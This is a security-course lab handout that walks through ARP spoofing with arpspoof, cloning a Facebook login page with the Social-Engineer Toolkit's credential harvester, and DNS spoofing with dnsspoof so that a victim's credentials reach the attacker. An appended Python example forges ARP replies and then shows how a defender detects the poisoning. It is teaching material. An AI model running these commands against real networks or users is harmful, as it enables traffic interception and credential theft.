Question
MITM requires 3 separate entities: the attacker, the victim and the web server. Since this is a lab, there are several controlled variables, e.g. the attacker and victim reside on the same LAN subnet with a single gateway. Hence, we only need to spoof the victim and the gateway.
This lab will be run on Kali and Windows simultaneously. The Kali user will be the attacker and the Windows user will be the victim.
Retrieve IP addresses of the Windows machine (Victim/client) and the Web server.
Please use the Kali VirtualBox machine to type the commands.
Open Command Prompt and type ipconfig /all. Note the MAC and IP address.
Would the attack work if the URL is secured (http vs. https)?
Note: you can include any valid website address.
Switch to Kali.
Open three Terminal windows to make the victim believe we are the web server and the server believe we are the victim. Terminal can be found on the dock to the left by default.
Enable IP forwarding - Type echo 1 > /proc/sys/net/ipv4/ip_forward
Would we achieve the results without ip_forward? Why/why not?
Use arpspoof command:
Note: I have used the IP addresses of the web server and the victim's machine for explanation purposes only. Make sure to input the actual IP addresses of the victim and web server respectively.
Arpspoof Victim to Server - Type in arpspoof -i eth0 -t 192.168.1.15 192.168.1.1 , where .15 belongs to the victim and .1 belongs to the server (this tells the victim that .1 is at the attacker's MAC).
Arpspoof Server to Victim - arpspoof -i eth0 -t 192.168.1.1 192.168.1.15 (this tells the server that .15 is at the attacker's MAC).
Executing these commands enables switching, making the victim believe that YOU, this host, the attacker, are the server, and the server believe that YOU are the victim (its client).
Upload a screenshot after executing the arpspoof command to ensure the swap of the victim's and server's addresses.
Now, we will make a temporary server with the help of Social Engineering toolkit.
Open a fresh terminal window, type in setoolkit to start the Social Engineering Toolkit and press Enter.
Note: If this is your first time importing or using SET, you will have to accept the Terms and Conditions. To do so, type in y upon prompt.
To select any of the attacks/tools, press the corresponding number followed by the Enter key.
In this lab, we will be using Social-Engineering Attacks. Type 1 and press enter as shown below.
Next, Select Website Attack Vectors. Type 2 and press enter.
Next, Select Credential Harvester Attack Method. Type 3 and press enter.
Next, Select Site Cloner. Type 2 and press enter.
The system will prompt you for an IP address. Enter your (the attacker's) IP address, followed by the website you would like to clone. In this case it is 192.168.1.18.
We chose Facebook but in reality, the attacker can choose any website, preferably one with username and password fields on the homepage.
Once you press Enter, SET will start cloning the login page of that website. Your screen should look similar to the screenshot below.
Note: While operating SET, at any time you wish to go back or restart SET, input 99.
Now that we have set up a temporary web server cloning the desired webpage, we can spoof DNS to carry out a stealthy attack. DNS spoofing will enable the attacker to give the cloned site an appealing name, which helps deceive the victim into opening that webpage and entering their credentials.
In other words, asking the victim to open 192.168.1.18 (the attacker's IP) would result in getting caught. Instead, ask the victim to visit a webpage named differently yet very close to the actual site, like logmein.facebook.com.
Let's start the DNS spoofing process by creating a text file. To do so, type the following in the terminal and press Enter.
pico hosts.txt
It will open a blank page. Type your (the attacker's) IP, followed by a space, followed by the name you wish to give to the cloned (fake) webpage. For example, I used: 192.168.1.18 logmein.facebook.com
Press CTRL + X (control and X) to save and exit.
When the system prompts to save, Press y. You will then be asked many other options as displayed below. Press Enter to exit the screen.
Open a fresh terminal window and type the following command to start DNSspoof.
dnsspoof -i eth0 -f hosts.txt
Switch to Windows and open a web browser.
Navigate to the DNS name you gave to the cloned webpage and log in with valid/invalid credentials.
The reason you can use valid or invalid credentials is that the purpose of this lab is to show you how to get/extract credentials. Since the victim would not know they are being attacked, by default they would enter their valid credentials.
What would happen after you input any (valid/invalid) credentials on the cloned website?
Switch back to Kali
You should see the victim's credentials in the terminal window.
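The following is an added illustration, not part of the lab handout above, of what the two arpspoof commands actually put on the wire and how a defender would notice it. It constructs the spoofed ARP replies (victim told that the gateway is at the attacker's MAC, gateway told that the victim is at the attacker's MAC), applies them to a naive host's ARP cache, and then runs the checks a defender would: has the gateway's MAC changed, and does one MAC now claim several IPs? The IP addresses are the lab's (192.168.1.15 victim, 192.168.1.1 gateway/server, 192.168.1.18 attacker); the MAC addresses are made up for the example. Only frame construction is shown; sending them requires a raw socket and root, which the example deliberately does not do.

```python
"""Build, decode and detect arpspoof-style ARP replies (added example, not lab code)."""
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2

# Lab addresses; MACs are constructed for the example only.
VICTIM_IP, GATEWAY_IP, ATTACKER_IP = "192.168.1.15", "192.168.1.1", "192.168.1.18"
VICTIM_MAC = "aa:bb:cc:00:00:15"
GATEWAY_MAC = "aa:bb:cc:00:00:01"
ATTACKER_MAC = "de:ad:be:ef:00:18"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def spoofed_arp_reply(target_ip, target_mac, impersonated_ip, attacker_mac):
    """Ethernet+ARP frame telling target_ip that impersonated_ip lives at attacker_mac.
    This is the frame 'arpspoof -t target_ip impersonated_ip' repeats every ~2 seconds."""
    eth = mac_bytes(target_mac) + mac_bytes(attacker_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=Ethernet, ptype=IPv4, hlen=6, plen=4, op=reply
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(attacker_mac) + socket.inet_aton(impersonated_ip)  # sender (forged)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)          # target
    return eth + arp


def parse_arp(frame):
    """Decode the 42-byte frame back into its fields."""
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    _, _, _, _, op = struct.unpack("!HHBBH", frame[14:22])
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": socket.inet_ntoa(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": socket.inet_ntoa(frame[38:42]),
    }


def apply_to_cache(cache, frame):
    """Behave like a naive host: accept any ARP reply and update the IP->MAC table."""
    info = parse_arp(frame)
    updated = dict(cache)
    updated[info["sender_ip"]] = info["sender_mac"]
    return updated


def detect_poisoning(cache, known_gateway_ip, known_gateway_mac):
    """Defender's checks: gateway MAC changed, or one MAC answering for several IPs."""
    findings = []
    current = cache.get(known_gateway_ip)
    if current is not None and current != known_gateway_mac:
        findings.append(f"gateway {known_gateway_ip} now maps to {current}")
    by_mac = {}
    for ip, mac in cache.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"{mac} claims {sorted(ips)}")
    return findings


def run_demo():
    """Poison both sides as the two arpspoof commands do; return the resulting caches."""
    victim_cache = {GATEWAY_IP: GATEWAY_MAC}
    gateway_cache = {VICTIM_IP: VICTIM_MAC, ATTACKER_IP: ATTACKER_MAC}
    to_victim = spoofed_arp_reply(VICTIM_IP, VICTIM_MAC, GATEWAY_IP, ATTACKER_MAC)
    to_gateway = spoofed_arp_reply(GATEWAY_IP, GATEWAY_MAC, VICTIM_IP, ATTACKER_MAC)
    return apply_to_cache(victim_cache, to_victim), apply_to_cache(gateway_cache, to_gateway)


if __name__ == "__main__":
    v, g = run_demo()
    print("victim cache:", v)
    print("gateway cache:", g)
    print("victim-side findings:", detect_poisoning(v, GATEWAY_IP, GATEWAY_MAC))
    print("gateway-side findings:", detect_poisoning(g, GATEWAY_IP, GATEWAY_MAC))
```

After both replies are accepted, every frame the victim addresses to the gateway and every frame the gateway addresses to the victim is delivered to the attacker's MAC; the attacker is only invisible if ip_forward relays those frames onward, otherwise the victim simply loses connectivity. The second check in detect_poisoning (one MAC claiming two IPs) is exactly what tools like arpwatch alert on, and is why static ARP entries or dynamic ARP inspection on the switch defeat this step of the lab.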